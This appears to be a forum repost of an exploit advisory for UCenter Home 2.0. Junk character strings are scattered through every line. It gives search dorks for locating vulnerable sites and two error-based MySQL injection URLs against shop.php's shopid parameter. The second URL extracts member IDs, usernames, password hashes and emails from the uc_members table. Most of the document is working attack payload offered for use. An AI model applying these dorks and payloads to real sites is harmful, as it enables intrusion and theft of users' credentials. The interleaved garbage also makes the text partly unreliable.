* L$ ^5 t, B. [! c/ G8 H; v
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ . _1 i$ m+ m% u) o
4 S8 \/ [9 E3 n5 z% z
! V& b4 L/ N0 j+ i4 Q/ h
+ U/ ~! g$ {% K8 A5 I
*/ Author : KnocKout
' C3 f2 b) _8 ], r: l5 q
% y8 E' P. q4 a5 @*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
. E) P% N+ O. ?. \8 w% n6 m6 N3 J0 e* @9 J) f- [
*/ Contact: knockoutr@msn.com * i) g; x g* R; y5 s# ~7 ^! c' v
" g2 {) X! M1 @& [*/ Cyber-Warrior.org/CWKnocKout
$ |( f6 `% \+ n; f# m" e+ f; |
" f- ^/ F4 f" r7 w& w__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
2 |! m5 D- @7 _; Y
# e( Y: r( O7 r3 g+ |% J! jScript : UCenter Home + r3 u) K1 K& f+ s8 c
3 ?6 C' s. o+ p1 ~5 X( G/ ]1 CVersion : 2.0 / f/ R- w8 d' P
( r! B' O: L$ H
Script HomePage : http://u.discuz.net/
( G6 t- _& E% H+ I. b: ?
6 ~7 E2 K( S1 m1 L% D__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== - }: I4 b4 \9 y5 e
6 b. k) U. n) Y3 B* @) ?
Dork : Powered by UCenter inurl:shop.php?ac=view
" E B1 w- \& N. j" D: D, B7 \$ r) M' c% u6 f
Dork 2 : inurl:shop.php?ac=view&shopid=
; e1 f" X3 H3 a. K2 q4 U- ?) R1 r
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 4 U* |3 \* u8 D5 H0 F
: }: }: w7 R; l Q, m& z0 F" M3 t* u1 XVuln file : Shop.php
; Q* S& T$ H N
7 x4 n1 H4 k! |7 _value's : (?)ac=view&shopid=
6 e+ c) m0 F# G
5 C" |/ E* W' A' SVulnerable Style : SQL Injection (MySQL Error Based) 2 [2 [* {; l! [
1 l; S. K: j* m& ^* b
Need Metarials : Hex Conversion
) y3 m! v. `5 M' I
) Y' Y4 d1 i! m" y2 ^' [, W__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
' V8 t" C( H' M* _. B, v" P3 g( U6 _9 K" G: i* z0 j2 r( R# P) J: d4 W
Your Need victim Database name. 9 J/ o5 J1 J* X; {9 ^% {6 a
4 U4 u4 ^8 z* Y; Tfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
7 |0 ^+ n9 D M4 V: X
: T& @+ ?1 Y' K/ v..
" R* J* p) X! A( Y* k+ N5 G
, W0 b; t) s; T( S p; k1 q7 e; }DB : Okey. * D4 P2 |2 H* R2 j
' A+ C# I/ i6 Q+ a8 _! B' V
your edit DB `[TARGET DB NAME]` . y; y( y7 n! p+ S* `+ t+ |
0 e9 H; d f G2 }, _Example : 'hiwir1_ucenter' : y( j: o, [9 i# \
+ ^ I( \' ^1 l; S2 i8 j3 G; W# IEdit : Okey. 6 z0 Y1 I T4 U+ X
) }" }% {' h V+ Z; Q( l! E# Q% T/ QYour use Hex conversion. And edit Your SQL Injection Exploit.. : p6 Q9 `- d. ?
* v: s& y r, p! C. C; u% @4 }0 z
# O% O3 i8 M; [" o% d' [# o/ w/ z0 q
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
4 ]9 y5 S6 E& \. a6 F3 H |
发表于 2013-2-27 21:31:31
收藏
支持
反对